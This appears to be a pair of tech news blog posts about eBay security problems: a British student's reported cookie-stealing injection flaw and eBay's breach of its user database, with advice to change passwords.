College Student Discovers a Second Ebay Security Flaw

Just a few days after discovering a flaw that compromised millions of user accounts, a 19-year-old British college student found another flaw in Ebay's website. It's not as bad as the one that forced pretty much everybody to change their Ebay passwords. But it's not good, either.

The second vulnerability affects the way that Ebay handles code from other sites, say, the Javascript that makes that auction listing look so pretty. Said teenager, Jordan Lee Jones, says that a flaw could let a hacker inject a page with malicious code that would steal a user's cookies. That, in turn, gives the hacker the opportunity to hijack the account.


Jones apparent contacted Ebay on Friday about this second flaw, but when he still hadn't heard back from them, he went ahead and published details on his blog on Monday. "Ebay should be on top of their stuff," he told PC World soon thereafter. At the very least, Ebay should pay attention to the white hat hackers who are trying to help them.

If you're wondering what you can do about this new flaw, the answer is unfortunately: not much. It's on Ebay to fix the vulnerability in their new code, and as long as you changed your password last week, you should be okay. On a related note, a new statistic just revealed by security researchers says that about 50 percent of Americans have been hacked in the last 12 months. So get used to it. [PC World]

You Need to Change Your Ebay Password Right Now

On Wednesday, Ebay will ask all users to change their passwords due to a massive cyberattack that hit the encrypted password database. The company says that no financial data that was compromised, and there's no evidence of unauthorized user activity. Either way, you can change your Ebay password right here.

So how did something like this happen to one of the biggest websites on the planet? A website that's responsible for hundreds of billions of dollars worth of transactions every year? Well, the details remain vague, but Ebay says the hackers hit "a small number of employee log-in credentials, allowing unauthorized access to eBay's corporate network." And from there, they got access to countless Ebay user accounts.


It's unclear if Ebay knew about the security vulnerability before the attack. (Target knew about their flaw a few months ago, when a data breach affected 110 million customers, and probably made you get a new debit card.) Ebay did say that the breach happened between late February and early March, though the company only detected the breach two weeks ago. Why they waited so long to tell users that their accounts were compromised is also unclear.

But again, according to Ebay's press release, nobody touched your money this time. All they got were each and every "eBay customers' name, encrypted password, email address, physical address, phone number and date of birth." Holy crap that's a lot of personal information. It's easy enough to change your password. It's a lot harder to change your name, physical address, phone number, and date of birth. [Ebay]

Note: As far as we know, the breach did not affect PayPal. You should still change your PayPal password, though, because why the heck not? Your money is in there, and you should keep it safe.